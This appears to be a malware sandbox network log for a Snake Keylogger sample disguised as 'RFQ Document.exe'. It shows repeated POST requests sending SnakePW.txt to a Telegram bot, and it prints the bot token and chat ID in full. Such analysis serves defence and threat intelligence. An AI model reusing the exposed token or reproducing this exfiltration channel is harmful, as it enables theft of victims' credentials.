                                            2021-09-28 05:58:24 UTC31INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12599,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            190192.168.2.450011149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:14 UTC304OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e1d3c50c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:14 UTC304OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 64 33 63 35 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e1d3c50cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:14 UTC304INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:14 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:14 UTC305INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12780,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            191192.168.2.450012149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:14 UTC305OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e1e937af
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:14 UTC306OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 65 39 33 37 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e1e937afContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:14 UTC306INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:14 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:14 UTC306INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12781,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            192192.168.2.450013149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:14 UTC307OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e20f5e8a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:14 UTC307OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 30 66 35 65 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e20f5e8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:14 UTC308INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:14 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:14 UTC308INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12782,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            193192.168.2.450014149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:14 UTC308OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e227801e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:14 UTC309OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 32 37 38 30 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e227801eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:15 UTC309INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:15 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:15 UTC310INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12783,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            194192.168.2.450015149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:15 UTC310OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e24632ff
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:15 UTC310OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 34 36 33 32 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e24632ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:15 UTC311INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:15 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:15 UTC311INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12784,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            195192.168.2.450016149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:15 UTC312OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e25baf50
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:15 UTC312OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 35 62 61 66 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e25baf50Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:15 UTC312INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:15 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:15 UTC313INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12785,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            196192.168.2.450017149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:15 UTC313OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e27aa8ab
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:15 UTC314OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 37 61 61 38 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e27aa8abContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:15 UTC314INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:15 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:15 UTC314INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64
